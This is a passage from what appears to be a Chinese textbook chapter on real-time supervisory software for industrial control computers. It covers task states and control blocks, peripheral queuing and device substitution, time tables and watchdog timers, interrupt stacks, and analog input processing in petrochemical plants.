等待状态(应用程序具备了执行条件,但暂时未被管理程序选中); ③ 运行状态(应用程序在执行中); ④ 延时状态(应用程序因某种原因暂不能执行,要过一会 儿再执行); ⑤ 挂起状态(应用程序暂时失去执行条件,如等待程序传 送,内存空间调整等); ⑥ 退出状态(应用程序执行完毕,这次不再执行了)。 系统中每一个应用程序在任何时刻都处于这六种状态之一( 各单位、厂家的系统中,这些状态可能有不完全相同的名称和分 法,但总是大同小异的)。这六种状态是重要的,它表现了管理程 序对应用程序的管理。只要较清楚地了解了这六种状态以及状态 之间的互相转化,那么就基本上了解了程序管理这一个组成部分 了。在系统运行时,应用程序依一定的条件从一种状态转化到另 一种状态是很频繁的,各种状态之间的互相转化。 管理程序在执行的过程中,需要随时了解每个应用程序的各 种状态。因而这六种状态除了等待状态和退出状态外,其他四种 状态都设有相应的状态表。管理程序通过检查状态表,就可以清 楚地知道每个应用程序目前所处的状态,从而作出正确的决定。 状态表的构成如图12-5所示。这是一张请求状态表,其他的状态 表基本和这个一样。状态表中每一级程序的状态,用一个机器字 表示。机器字的16位就表示该级程序的16个副级(这里是以字长 为16位的机器为例)。某位设定为“1”时,表示该副级程序请求起 动;而某位设定为“0”时,表示该副级程序退出。在这个例子 中,每一级程序最多有十六个副级。若每一级程序的副级多手十 六个,则可以用两个、三个或更多的机器字表示一级程序。状态 表的设定和清除都是由宏指令完成的。这张请求状态表是由请求宏指令设定的。 (四)程序管理的工作过程 以上分别介绍了程序管理的三个主要组成部分,但都是分开 讲的,没有提到它们之间的互相关系。这里就着重介绍一下这种 互相关系。整个工作过程就是由各个组成部分和这种互相关系构 成的。程序管理的中心原则是将目前处于等待状态的级别最高的 应用程序投入运行。进行程序管理的主要有四个程序:查优程序、 请求程序、退出程序和延时程序。其中查优程序是核心部分,其 余三个程序实际上就是前面提到过的宏指令。 整个过程一般如下:应用程序在希望起动时,首先得调动请 求宏指令,由请求宏指令根据它的程序名设定相应的请求位。随 后由查优程序检查一下请求起动的应用程序的级别是否高于当前 在执行的应用程序的级别。如果高于的话,则由查优程序将请求 起动的应用程序起动,而当前正在执行的应用程序就被中断了。 如果等于或低于的话,则请求起动的应用程序暂时还没有资格起 动,进行返回,当前正在执行的应用程序继续执行。希望起动的 应用程序只是设定了一个请求位,等待查优程序以后再去检查。 应用程序调用了请求宏指令后,从状态上来说,它就是从退出状态转到了请求状态。 应用程序在执行完毕时,必须调用退出宏指令,由退出宏指 令将该程序所占用的工作区、寄存器等等各种资源放弃,供其他 的应用程序使用。退出宏指令的工作是简单的,但也是很重要 的,以便及时释放不用的资源。 应用程序在执行的过程中,如果遇到表格或排队占满了的情 况,它就得调用延时宏指令。过一会儿等表格或排队空出时再继 续执行。延时的时间可由应用程序自己决定。延时时间的计时是 由时间程序进行的。(后面还要介绍)。延时时间到了后,应用程序 就去检查一下表格或排队是否有空。如果有空,则该应用程序就 可以继续执行了(进入等待状态)。如果仍然没有空,则应用程序 就得再调用一次延时宏指令。这样一直到发现有空为止。应用程 序在执行过程中如果调用了延时宏指令,则从状态上来说,它是 从运行状态转到了延时状态。应用程序延时结束后,就从延时状 态转到了等待状态。 查优程序的工作是比较多的,过程也比较复杂,这里只能略 作介绍。查优程序的主要任务是找出当前级别最高的应用程序, 并创造各种条件将它投入运行。它首先检查最高级的应用程序, 然后依次检查下来,直到检查到最低级的应用程序。整个检查的 过程大略为:查优程序首先检查被查的那一级应用程序是否设定 了作业控制块(TCB:Task Control Block)。每一个处于等待 或运行状态的应用程序,都有一个对应的TCB, 其中记录着该应 用程序的各种信息,管理程序只要通过检查TCB就可以随时掌握 该应用程序的进程和变化情况,从而准确和有效地进行管理。 一 个TCB由若干个机器字组成,在管理程序中一般有十几个到二十 几个TCB, 这样在同一时刻就可以有这么多的应用程序处于待命 状态。如果该级应用程序设定了一个或几个TCB, 那么还要看一 下属于该级的应用程序是否有一个已经在执行了。如果有的话, 查优程序就让这个程序继续执行。如果没有,则接下来检查该级 应用程序是否处于延时状态或挂起状态。如果都不是,则属于该级的,设定了TCB的应用程序中最先设定TCB的那个应用程序就 可以起动执行了。这时,找到TCB, 占用工作区,并检查一下是 否有低级的程序被中断,如有则进行数据保存处理,将各寄存器 的内容和断点地址保存起来,以便该低级程序再起动时使用。最 后取出这一次起动执行的应用程序的保存数据,恢复现场(如果 以前它也被中断过的话)。这样,这个应用程序就起动执行了。 在检查过程中,如果发现某一级应用程序一个TCB 也没有设 定,这也并不意味着该级没有一个可以投入运行的应用程序,而 可能有请求起动的应用程序。这时先检查一下TCB 和外存排队表 是否占满了。如果没有满,则检查该级的请求状态表。如果找到 了一个请求起动的应用程序,则设定该程序的TCB 。如果这个程 序是常驻内存的应用程序,它现在就处于等待状态了。如果这个 程序是常驻外存的程序,它还得从外存中往自己的工作区调程 序。这时要占用内存工作区、起动调外存程序。在调程序的过程 中,它是处于挂起状态的。当程序全部调入内存工作区、或程序 的一部分填满了工作区后,它才处于等待状态。处于等待状态的 程序再经查优程序选中时就可以起动执行了。 在检查中,如果发现某一级既没有一个可投入运行的应用程 序,也没有处于请求状态的应用程序,则查优程序就去检查下一 级应用程序,检查过程同上,直到查到一个可以起动的或请求起 动的应用程序。如果查完了所有的级别还没有查到一个可以起动 的或请求起动的应用程序,则查优程序原地等待,需要时再从头 开始工作。 上述几个程序的相互关系,可由图12-6表示。这里只画出了 主要的部分,省略了一些其他部分,诸如中断和查优程序的关 系,多个应用程序的相互关系等。图12-7和图12-8是这几个程序的简单框图,表示大致的工作过程。 二、设备管理 (一)设备的分类和连接方式 工业控制机所带的外部设备可分成两大类:快速设备和慢速设备。快速设备是磁鼓、磁盘和磁带等。慢速设备是打字机、纸 带输入机、穿孔机等。快速设备一般以数据通道和主机相连接。 这类设备传输速度快,而且是成批交换数据的。交换的过程是由 硬件用插入的方法完成的。在一批数据交换结束时才发出中断信 号。对这类设备的管理比较简单,只在发生中断时检查一下交换 是否结束。而慢速设备是以慢速通道和主机相连接的。这类设备 以字符为单位进行输入输出,每动作一次发一次中断信号。这类设备动作较慢,而且种类和数量一般又比较多,因此设备管理的 主要对象就是慢速设备。 外部设备与主机的连接,视机器类型的不同而有各种不同的 连接方式。归纳起来有两种方法:第一种方法是,每一台设备都 有一条独立的通道。这样,各种设备可以并行工作,效率较高。 第二种方法是,几台设备合用一条通道,这样连在同一条通道上 的设备就只能串行工作了,效率较低。这两种方法各有利弊。第 一种方法效率高,但要求机器的通道较复杂。第二种方法效率较 低,但机器的通道较简单。 一般说来, 一台计算机主要的功能是 控制生产的话,则第二种方法是能够满足要求的。因为控制生产 时,各种外部设备的动作并不十分频繁。但应注意到,当通道发 生故障时,有可能带来一些麻烦,有时甚至连错误信息都无法打 印。如果采用第一种方法,则机器除了进行控制之外还能做一些 其他的工作,如穿、复、校纸带,使用算法语言进行计算等。 (二)设备管理的目的和原则 设备管理的主要目的是保证各种设备以最大的速度并行工 作,在设备动作的间隙中能执行程序,提高设备的利用率。在设 备出错时,进行适当的处理。尽量使系统不因一台设备的故障而 整个丧失工作机能。设备管理的原则是先来先用, 一用到底。即 先来的程序优先使用设备,而不管程序的级别如何。不允许高级 程序中断低级程序使用的设备,只能等低级程序用完该设备后, 高级程序再接着使用该设备。设备一旦起动后,就必须完成所有 的任务,而不管这些任务排队次序的先后。在几台设备共用一条 通道的情况下,速度快的设备优先动作。例如,当纸带输入机和 打字机同时请求动作时,当纸带输入机比打字机动作快时,纸带 输入机就优先动作。等其动作完毕后,打字机再接着动作。 (三)输出设备的管理 输出设备的类型较多,各自的特性也有所不同,但它们和主 机的连接方法大多相同,都是以字符为单位进行输出的。因此, 可以设置一个所有输出设备都适用的宏指令。在使用时,不同的设备给出不同的设备号就可以了。 为了使管理程序能准确地了解各种输出设备的进程,每台输 出设备在动作过程中,也要类似设定TCB一样,设定一个外部设 备控制块 (Peripheral Control Block), 简称PCB 。PCB 中记 录着管理程序所需要的各种信息,如设备号、数据存放地址、输 出了多少字符等等。在输出结束时,该设备的 PCB 就清除了。 PCB和TCB 有些区别。PCB 是每台设备固有的,即一台设备有一 个相应的 PCB 。而 TCB 是所有的应用程序共用的,即几十个或 几百个应用程序共用十几个TCB。 为了提高机器和设备的利用率,减少外部设备在动作的过程 中和主机的联系。每一台输出设备都必须配备一个字符缓冲区。 缓冲区中一般可放几十个字符。在执行输出宏指令时,先将要输 出的字符送入缓冲区,待缓冲区填满后就起动相应的设备,进行 输出。设备一旦起动后,主机就和它脱离关系,转去执行其他的 程序。等到设备动作结束,发出了中断信号后,主机才进行相应 的处理。这时先用输入指令读入该设备的状态,包括设备动作结 束、设备忙、时间超过、通道是否正常等一些状态, 一般由一个 机器字组成。如果从设备的状态中判断出设备工作正常,则检查相应的缓冲区中是否还有字符,若还有,则取出下一个继续输 出。然后主机又转去执行其他程序了。若这个缓冲区的字符用完 了,就要再次起动输出宏指令,填满缓冲区,再继续输出。这样反复进行,直到输出结束。输出结束后,取消该设备的登记,关 闭该设备的电源。这样做,可大大减少外部设备和主机的联系, 同时只要通道允许,可以有多台外部设备同时动作。为了提高每一台输出设备的利用率,可以设置一个输出设备排队表。其中存放着等待输出的作业。这样可以使每一台设备一 旦起动后,就不停顿地完成所有作业的输出要求。排队表中每一 个排队由两个机器字组成, 一个字表示设备号, 一个字表示格式 地址。排队表中的排队数,根据设备和使用要求的具体情况决定。 一般有十个左右的排队就够了。使用时,每台设备起动时必 须设定排队表,完成一个作业后必须检查排队表。 某一应用程序在执行过程中,如需进行输出,在决定了输出 格式和数据后,首先检查排队表是否排满。如已排满,则调用延 时宏指令,过一段时间再来排队。如排队表未满,则该作业排入 排队表,并检查对应该设备的PCB 是否有空, PCB 有空表示该 设备没有动作,则可以设定PCB, 从排队表中取出该作业,转入 输出宏指令,起动该设备进行输出。如PCB 没有空,表示该设备 正在进行一个输出作业,申请输出的作业就在排队表中等候。此 时不转到输出宏指令,而是返回。 当某一台输出设备完成一个输出作业后,输出宏指令就按照 先后次序检查排队表,看在排队表中等待输出的作业中是否有要 使用这个设备的作业,如有则取出这个作业,设定PCB, 输出宏 指令继续执行输出。这时排队表中就空出一个位置,允许新来的 作业或经过延时的作业排入排队表。这样反复进行,直到完成排 队表中所有的作业。当设备完成所有的作业后,输出宏指令取消 它的登记,关闭电源。可见,采用了排队表后,可以使每台输出 设备都不停歇地完成所有作业,避免频繁地起动和停止,这对提高设备的利用率和寿命都是有益的。 设备一旦起动工作后就不被其他作业的请求所打断,这一原 则也适用于报警打印。但为了保证及时报警,可将其作业固定放 在排队表的第一个排队中 (四)输入设备的管理 输入设备的处理不同于输出设备。目前普遍使用的输入设备 是纸带输入机和电传打字机(或控制打字机)。同输出的处理一 样,输入也采用了宏指令。每调用一次输入宏指令,可以得到一 个字符,多次调用就可以得到一批字符。但是,纸带输入机的输 入方式和控制打字机的输入方式是不同的,要分别进行处理。 目前适用于工业控制机的纸带输入机是快启停的纸带输入 机。采用这类纸带输入机的优点,是可以进行并行的输入。即在 主机在线运行的同时,也可以输入和校对纸带。快启停纸带输入 机是由输入指令控制的,每执行一次输入指令,可以从纸带输入 机的缓冲寄存器中读入一排字符,同时起动纸带输入机读入下一排字符。纸带输入机读入一排字符送入缓冲寄存器后就停下来, 同时发出中断信号。其中断处理可以很简单:首先读入状态,判 断工作是否正常,然后设定一个读入准备标志。当执行纸带输入 机的输入宏指令时,首先检查是否有这个读入准备标志,如查不 到则反复查。在查找过程中如出现高级程序的执行请求也没有影 响,可以先让高级程序执行。因为不取走纸带输入机缓冲寄存器 中的字符,它是不会再起动读入下一排字符的。如果查到了这个 读入准备标志,则用输入指令读入缓冲寄存器中的字符,同时又 一次起动纸带输入机,并将读入准备标志清除。重复以上过程, 就可以在其他应用程序执行的间隙中读完纸带上的全部字符。可 见,由于快启停纸带输入机的特点,在输入时可不要内存缓冲区 保存字符,并使得输入宏指令简单。 但有些系统采用的不是快启停的纸带输入机。这时当纸带输 入机输入纸带时其他的应用程序就无法动作了,效率相对较低。 不过当一台计算机仅仅用来作控制的话, 一般只在系统初始起动 时才需要使用纸带输入机,平时并不需要经常使用纸带输入机。 因此,非快启停的纸带输入机一般也能满足要求。 控制打字机的输入处理是类似的,但不同点是:纸带输入机 是一开电源就有字符送入缓冲寄存器;而控制打字机必须由人按 下按键时,才送入字符并发出中断信号。该中断的处理是:首先 读入状态,判断控制打字机工作是否正常。然后用输入指令读入 字符并送入缓冲区,同时进行计数并返回。控制打字机的输入宏 指令执行时,首先检查缓冲区中是否有字符。如有则取回第一个 字符,如没有则反复查,直到有字符可取为止。控制打字机的输 入一定要有内存缓冲区,这是因为有可能在连续按几个按键的时 间内,有更高级程序正在执行中,而调用输入宏指令的程序还未 能执行,如不设置内存缓冲区就会丢失字符。 一般该缓冲区只要 能存放十个左右的字符就足够了。 (五)设备的出错处理 在输入输出的中断处理中,如发现设备工作不正常,则采取 相应的措施。设备的错误状态一般有三种:时间超过、动作超过、 通道传送奇偶错。 设备的出错处理方法必须根据通道和设备的具体情况来确 定。在几台设备合用一条通道的情况下,如果通道发生故障,唯 有及早报警,提醒操作人员处理。如果每台设备都有一条通道, 则当某个通道发生故障时,就可以有灵活的处理方法。对设备也 一样,如果使用的外部设备都是单一功能的,有时就无法进行处 理;如果使用的外部设备中,有些是多功能的,则解决故障的方 法就比较多。 设备出错的一般处理方法是进行报警,并打印错误信息。在 通道和设备条件允许的情况下,还可以采用设备代替的方法,这 就要求每台设备都有自己独立的通道,同时还要求设备具有相互 代替的功能。例如,有些系统使用的制表打字机是能进行键盘输 入的,或控制打字机可以同时用于穿、复、校纸带和进行纸带输 入。这样在某一台设备出错时,就可以找一台工作正常的设备来 代替它的工作,使整个系统能够继续正常运行。 处理的方法是:在进行报警打印的同时,从设备登记表中找 出相应的代替设备。这时必须检查一下代替设备是否就是该出错 设备。因为可能会发生这样的情况: A→B→C→A (箭头表示 后者可代替前者)。如果发生了这样的情况,说明所有的可代替 设备都发生了故障。这时只好取消这个作业。如果检查结果代替 设备不是该出错设备,还要再检查一下这个代替设备是否也被其 他设备代替了。这样一直到找到一个可用的代替设备,则将代替 设备记入代替设备表,并检查排队表,看是否有排队等待使用该 出错设备的其他作业,如有则也用代替设备代替。最后还要检查 一下以前所有的代替设备,看是否有这次出错的设备,如有则也 用这次的代替设备代替。这样就实现了设备之间的互相代替。当 起动一台设备前,先检查一下代替设备表,看该设备是否已被代 替。如果已被代替,则不能起动该设备,而是起动代替设备。因 此,设备一旦发生故障,它的所有作业将由代替设备去完成。这 种设备代替的方法,对提高系统的可靠性是有帮助的。当出错设 备修复后,须进行设备恢复,取消代替设备,然后才能重新投入 使用。寻找代替设备的过程如图12-12所示。 对于像磁鼓这类快速设备,出错处理是再传送。即在磁鼓出 错时不立即进行处理,而是再传送几次。如果发生的是偶然错误, 那么再传送几次一般就可以克服了,机器仍然可以照常工作。如 果不是偶然性错误,再传送几次仍然出错,就要看传送的是数据 还是程序。如是数据,则可取消这次传送,机器继续运行。如是 程序,则立即停机并报警。再传送的次数一般在3~7次之间。 以上有关设备管理的内容都是关于外部设备的,因为外部设 备的管理一般是作为管理程序的一个内容的。而外围设备的管理则有所不同,这是因为不同的使用对象会给外围设备的种类和数 量造成很大的差别,故其管理一般由用户自己决定,这些程序一 般作为子程序库中的程序,而不作为管理程序中的程序。 三、时间管理 在一个实时操作系统中,系统时间的计算和管理是很重要 的,整个软件系统的动作、应用程序的执行、设备的动作、控制 的实现等等都和时间有密切关系。因此,时间管理是管理程序的 一个重要环节。时间管理的好坏,对整个软件系统的使用效率有 很大的影响。 (一)时间计算 工业控制机都有一个时钟源。这个时钟源一般是一个50~60 周的振荡器。也可以用市电的频率作为时钟源,但要求市电的频 率稳定。如有发电机组供电,则可用发电机送出的较稳定的电源 频率作为时钟源。时钟源的振荡经计数到一定时间(即系统的最 小时间单位,如几百毫秒),则进入时间程序。这个最小时间单 位一般是作为延时计时用的。因为应用程序的延时时间用秒作单 位显得太浪费时间。延时计算的进行方式是:将由延时宏指令设 定的延时计数器依次减1,并判断是否有计数器减到零。如有计 数器已减到零,说明对应该计数器的应用程序的延时时间已到, 则消除这个应用程序的延时标志,起动该应用程序。 如果时间计数到了1秒钟,则时间程序除进行延时计算之外, 还必须计算系统时间和检查时间表。系统时间是系统运行的时 间, 一般和实际时间相一致。如果到了二十四小时,还须计算年、 月、日以及修改时间表。这部分程序有时称为日历程序。 (二)时间表 时间表是用来起动应用程序的,时间表中存放的是应用程序 的起动时间, 一般以秒为单位。在一个控制系统中,应用程序的 起动方式有定时起动和随机起动两种。请求起动的途径可通过中断信号、操作台、控制打字机及其他应用程序。这些不同的途径两种不同的访问方法。第一种方法是针对起动周期时间表的。这 种时间表的计数单元中放的是应用程序的起动周期。访问时,将 时间表中每一个计数单元依次减一。若减到零,或在访问计数单 元时,其内容已经是零了,则对应的应用程序就到了起动的时间 了。这时从紧接着计数单元的、按照计数单元次序排列的程序名表中取出相应的程序名,调用请求宏指令,请求起动。直到访问完整个时间表。在访问中,如遇到某一计数单元的内容是预先规定好的关闭值,则跳过这个计数单元。 第二种方法是针对起动时间表的。这种时间表的计数单元中放的是应用程序的起动时间。访问时将计数单元中的应用程序的起动时间和系统时间依次进行比较。 一旦这两个时间一致,或系统时间大于应用程序的起动时间,则说明对应的应用程序已经到了该起动的时间了。同前一样地取出程序名并调用请求宏指令。直到访问完整个时间表。在访问过程中若遇到关闭值,也同样跳过。 在系统初始起动时,管理程序就在各定时起动的应用程序所对应的时间表计数单元中,设定了起动时间或起动周期,这样就可以在时间到了时及时起动。执行完毕后,它们也还必须调用一个设定时间或周期的子程序,在 相应的计数单元中设定下一次起动的时间或周期。这样就实现了 应用程序的定时起动。由于只要相应计数单元的内容为零,该程 序就可以马上请求起动,因此应用程序之间的互相起动,可以采 用将其计数单元设定为零来实现。 随机起动的应用程序平时在时间表计数单元中的内容都是关 闭值,因此它们不会自己起动。在需要起动时,可将对应的计数 单元设定为零,则在时间管理的作用下它们就可以很快起动了。 当执行完毕时,要将自己对应的计数单元重新设定为关闭值。 在随机起动的应用程序中,还有一些是一旦起动后,就定时 起动的应用程序。这只要在它们执行完毕后,同定时起动的应用 程序一样,设定好下一次需要起动的时间或周期即可。为了在不 需要时停止这些程序的运行,系统中可设置取消程序,由它将那 些程序的计数单元的内容设定为关闭值。 可见,有了时间表后,应用程序的起动和停止就变得十分灵 活,用户可以很方便地改变各种应用程序的起动时间、起动周期 以及起动方式等。这一优点在系统配备大量应用程序的情况尤为 突出。 (三)时间监视 为了防止在程序出错时进入死循环,而影响整个系统的运 行,必须对程序进行时间监视。在机器中设置时间监视器,每隔 一定的时间进行计数,计数满了就发出中断信号,表示超出了正 常的运行时间。而程序可以随时清除时间监视器,因此正常时就 不会发出这种中断信号。有了这套机构就可以对程序进行时间监 视了。每一个程序在执行完毕后都必须清除时间监视器,表示正 常。程序不正常时,往往不能在预定的时间内清除时间监视器, 则由管理程序处理它发出的中断。 一般来说,程序进入死循环多 是偶然的,因此管理程序可以将整个系统从头重新起动,往往就 可以解决问题。程序的监视时间可以由系统中最长的程序的执行 时间来确定,通常不会超过几十秒。 四、 中断管理 工业控制机都具有较完善的中断机构和较多的中断点数,这 是工业控制机的特点之一。这是因为机器在线运行时,要随时响 应各种中断并立即进行各种处理。在一个系统中,中断处理的好 坏,对系统的使用效率和可靠性有很大影响。因此,中断管理尽 管相对来说比较简单,但它也是管理程序的一个重要组成部分。 中断管理的具体实现要根据机器中断机构的具体情况来决定。 一 般说来,如果机器的中断机构比较完善,则中断管理的程序就比 较简单;反之,中断管理的程序就比较复杂。 (一)中断机构 工业控制机的中断点数较多, 一般在十几点到几十点之间。 这些中断点大致可分为以下几类:内部中断、时间中断、通道中 断、过程中断等。根据每类中断的重要性而把它们划分为几级。 一般地,内部中断是机器本身的出错中断,是最高级的中断。它 包括奇偶校验错、非法操作码、非法地址码、溢出、存贮保护错 等等。有些机器把时间中断也算入内部中断。通道中断是各种外 部设备动作结束时发出的中断,有些机器把时间中断算入通道中 断。过程中断是最低级的中断,是现场生产过程和工艺操作台发 来的中断,其中断点数最多,而且可扩。也有的机器把操作员命 令算作最高级中断优先响应。 这些中断又分为可拒绝中断和不可拒绝中断。不可拒绝中断 是在任何情况下都必须响应的中断,是重要的中断。内部中断和 过程中断的一部分可以作为不可拒绝中断。可拒绝中断只有在中 断屏蔽触发器清除时才能响应。通道中断和过程中断的一部分可 以作为可拒绝中断。 机器发生中断时,当前正在执行的程序就得停止,转去执行 相应的中断处理程序。但在执行中断处理程序之前,还必须屏蔽 中断,保存当前正在执行的程序的断点地址和有关数据。由于各 种中断发生时,都要进行这一步工作,所以这步工作可以编成宏 指令或子程序的形式,在发生中断时首先调用它。中断处理完毕时,要开放中断,恢复断点地址和有关数据,使被中断的程序继 续执行。由于每次中断处理完毕时都要进行这一步工作,所以也 可以编成宏指令或子程序的形式。 (二)中断处理 时间中断和通道中断的处理已在相应的管理部分介绍过了。 至于过程中断的处理,要根据系统的具体情况决定。 对于内部中断的处理实际上就是出错处理。在出错时,处理 程序首先要判断一下是管理程序出错还是应用程序出错。如果是 应用程序出错,而且是第一次出错,则让该程序再执行一次。如 果这次执行对了,则整个系统就继续运行。如果二次执行都错 了,该程序就不能再执行下去了,取消它的执行资格,同时进行 报警打印,提醒操作人员进行处理。应用程序在出错时,除了本 身被取消外,不影响系统的运行。 管理程序一旦出错,处理方法与程序进入死循环时的处理方 法一样,即进行再起动。这时要将整个系统重新从外存中调入内 存,然后从头开始起动,同时进行报警打印。在有些系统中,程 序一旦出错,不管是应用程序还是管理程序,都采用这种处理方 法。可见,工业控制机如果没有外存作为后盾,可靠性是很难得 到保证的。 对多重中断的处理也是中断处理的一个重要内容。在可拒绝 中断的情况下,不会发生多重中断,因为在处理一个中断时,其 他可拒绝中断是被屏蔽着的,来了也不响应。但在不可拒绝中断 的情况下,当处理一个中断的过程中,还必须响应更高级的中 断。这时当前的处理就要停下来,转去执行更高级的中断处理。 但为了在处理完高级中断时,能转回来继续进行原来的中断处 理,也必须保护断点地址和有关数据。可见,这时这个过程就不 那么简单了。因为第二次中断处理会破坏第一次的断点地址和有 关数据,第三次中断处理又会破坏第二次的断点地址和有关数 据,等等。 为了解决这个问题,可开辟一组内存单元来保存断点地址和有关数据。这一组单元断点地址和有关数据的存入和取出,按后 进先出的原则进行。发生中断时,首先将这组单元下推一个单 元,然后将断点地址和有关数据送入,再转去执行中断处理程序。 如果在处理过程中又发生新的中断,则同样将这组单元下推一个 单元,然后将新的断点地址和有关数据送入,再转去执行新的中 断处理。可见各次中断的断点地址和有关数据是按先后次序排列 在这组单元中的。中断处理完毕时,即可取出上一次的断点地址 和有关数据,恢复现场,然后将这组单元的指针上托一个单元。 这样,最后进入这组单元的断点地址和有关数据最先被取走,就 能在发生多重中断时有条不素地依次处理完所有的中断了。这组 单元称为“栈”(stack) 或“下推表”。 第三节 应 用 程 序 一、子程序库 因为子程序库和用户关系密切,而且又和使用的实际情况有 一定的联系,所以将它放在这一部分来谈。在石油化工系统控制 机的软件中,是需要配备一个小而简单的子程序库的。其中一般 配有大约20个左右的子程序。整个子程序库是放在内存中的,任何应用程序随时都可以调用。子程序本身是没有任何程序级别 的,但当被某一应用程序调用后,那它就和该应用程序同级。可 是在子程序内部,可以将子程序分成1级子程序和2级子程序。 1级和2级子程序是任何应用程序都可以调用的,但在子程序之 间, 1级子程序可以调用2级子程序, 2级子程序只能被调用, 它不能调用1级子程序。子程序内部进行这样的区别是为了使子 程序的层次清楚,方便应用程序的编制。而不是非要这样区分不 可。在子程序数量较多时进行这样的区分是有一定方便之处的。 在石油化工系统控制机的子程序库中, 一般要有这样一些子 程序:开方、用鼓、打印、模拟量输入、控制输出以及工程值变 换等等。此外还有一些本系统专用的子程序。但由于各系统不同 的机器和使用条件,使得这些子程序在结构和实现方法上有很大 的差别,所以在这里只能大概地谈一下。 在石油化工系统的实际使用中,标准函数子程序只需要一个 开方就可以了,诸如对数、三角函数在通常的使用中是不需要 的。开方子程序有定点和浮点两种。定点开方的精度一般,但程 序较短。浮点开方的精度较高,但程序较长。开方一般是用迭代 法,公式为; 式中x 是被开方数。 取初值的公式为: y=0.5625x+0.4444 式中x 是被开方数。 对于工业控制来说,它的精度要求是不高的,所以用这个公 式迭代三次就可以满足要求了。 用鼓子程序有物理读/写鼓和逻辑读/写鼓两种。所谓物理 读/写鼓就是指一般的用鼓子程序,在调用它时必须给出内外存 地址和传送长度。而逻辑读/写鼓是指专门读/写文件的子程序, 在调用时只要给出一个文件号就可以了,并不需要实际的地址。 这样做就能方便应用程序的编制,同时又有利于数据管理。所谓 文件,就是一些放数据的专门区域。在这个区域中,各种数据按 照类别和需要被分成不同的集合。每一个集合就称为一个文件。 由于文件的数量多,每一个文件又比较长,所以文件都是放在外 存中的。而只有极个别的,经常需要使用的、而且又不太长的文 件才允许放在内存中。在石油化工系统控制机的软件中, 一般需 要这样一些文件:瞬时工艺值文件、报表数据文件、报表编集文 件、平均值文件、积算值文件、报警打印文件、各种控制字文件 等等。这样将各种不同的数据归类分成文件后,对数据处理来说 是一个很大的方便,在数据处理工作量较大时这种方便更为明 显。这样在需要时就可以一下子得到一大批所要求的各种数据。 这对控制、显示、制表来说都是很大的方便。各种数据也做到了 层次清楚,互不干扰,读取容易,修改方便。 一台控制机除了控制外,打印和制表也是它的一项重要任 务。所以打印子程序质量的好坏对控制机的使用效率是很有关系 的。在系统的打印任务比较少的情况下,那么在需要打印时可将 数据分批调入内存,然后调用打印宏指令进行打印。打印完了一 批数据后再调入一批数据继续打印。这样直到结束。但是系统的 打印任务比较繁重,而且又带有多台打字机,这样的方法就不能满足要求了。因为在打印的过程中,那个调用打印宏指令的应用程序尽管已经不在执行,但它还是占用着内存,因为打印宏指令 所需要的数据是由它提供的。这样就要影响机器的使用效率了。 为了解决这个问题,可将打印数据全放在外存中,这样应用程序 调用了打印宏指令后就可以立即退出了,不再占用内存。 但是,将打印数据放在外存中就产生了一个区域分配的问 题。简单的方法是各个应用程序独立占有打印区域,但这样又将 浪费大量的外存。比较好的方法是在外存中开辟一些大小相同的 共同打印区域,这些区域并不是哪个应用程序专用的,而是公用 的共同区域。某一个应用程序在需要打印时首先必须检查打印 区,然后将数据送入有空的打印区。打印区的数量可根据具体情 况决定, 一般有16个就足够了。每个打印区的长度可在半K 左 右。进行了这样的安排后,打印子程序就必须有这样的功能:检 查打印区,传送数据和调用打印宏指令。 打印过程简述如下:在打印子程序被调用后,它首先检查打 印区是否有空,只要有一个空着,它就将数据送入打印区,同时 设定该打印区的占用标志。如打印区全部占满了,它就得调用延 时宏指令,过一会儿再去检查。传送结束后,就从输出设备表中 找出对应该打印区的设备,设定输出标志,然后调用打印宏指令 进行输出。打印结束后,打印子程序取消该打印区的输出标志和 占用标志,然后就返回了。这一过程简略表示于图12-18。 模拟量输入子程序的主要工作是根据指定的采用继电器和采 样点数将模拟量读入,并经过模/数转换器转换成数字信号。同 时对模/数转换器进行检查。由于目前较多的是用干簧继电器作 为采样继电器,但干簧继电器的可靠性是有些问题的。所以在这 种情况下对重要的信号就要取多次采样的中值,或对采样信号进 行数字滤波。这些工作也是由模拟量输入子程序完成的。但如果 采用湿簧继电器作为采样继电器的话,那么可靠性就强多了。 控制输出子程序是根据控制程序算出的阀门改变量去输出带 动阀门的。控制输出大多数是采用脉冲输出的,但也有一些是采 用电流输出的。因为在一个系统中控制程序可能不止一个,所以工程值变换子程序是将模/数转换器输出的信号转换成工程 值的程序。以供显示、制表之用。在石油化工系统中一般有这样 一些工程单位:温度(℃),流量(t/h), 压力(kg/cm²), 阀开度 (%),液面(M), 比重或密度(kg/cm³), 重量(t) 等等。 二、模拟量输入程序 控制机的模拟量输入一般是定时的巡回检测,将现场各种工 艺信号送入机器,同时进行测量和检查。在发现工艺值异常时进 行报警,提醒工艺人员进行处理和解决。 一台工业控制机的模拟 量输入点数是比较多的, 一般约在64~2048点之间。对于这些采 样点应该根据采样点的重要性和对象变化的速度进行分组。对象 变化速度快的和重要的采样点可安排在采样周期较短的组, 一般 的采样点可安排在采样周期较长的组。至于采样周期的选择是要 从两方面考虑的, 一方面要考虑到对象变化的速度,另一方面要考虑到采样继电器的寿命。目前石油化工系统控制机的采样周期 在2.56秒~5分钟之间。 程序中对每一个采样点都用了若干个机器字表示该点的特 征。这些特征分别是采样继电器号,模/数转换器号,模/数转换 量程,工程值变换,小数点位数,工程单位,仪表量程,报警上 下限。可见,这些特征字的数量是比较多的,在采样点数多时可 达十几K 。 这些特征字都是归入同一个文件的,在需要时可分组 调入内存使用。 读入一点模拟值,转换成数字量后,还必须转换成工艺人员 所熟悉的工程值。转换的公式一般有三个,线性值、开方值、热 电偶和热电阻值。某一采样点具体使用哪一个公式,公式中使用 哪一些系数都是由特征字决定的。 这里公式(1)中,第一式是用来转换从0起始的线性值 的,第二式是用来转换不是从0起始的线性值的。数字量经过这 些公式之一转换后,再根据特征字指出的小数点位数和工程单位 保留小数位,加上工程单位后就成了工艺人员所熟悉的工程值 了。在转换成工程值后,还要根据特征字指出的报警上下限进行 越限检查。在第一次发现越限时亦不报警,而是再输入一次,再 进行一次检查。如果二次发现越限那就得进行报警了,同时进行报警打印。这样做是为了防止在工艺或仪表偶然跳动时产生的不 必要的报警。这些工作都完成了后,最后才将各种数据送入不同 的文件,供控制和仪表使用。 模拟量输入程序是由时间表根据采样周期起动的。它起动 后,首先从文件中调出一组特征字,然后取出这组特征字的采样 继电器号去调用模拟量输入子程序。模拟量输入子程序读入模拟 量,转换成数字信号后就返回到了模拟量输入程序。这时它再进 行转换,越限检查,最后送入文件。 一组特征字处理完了后它再 调入下一组特征字继续处理,直到处理完属于该采样周期的所有 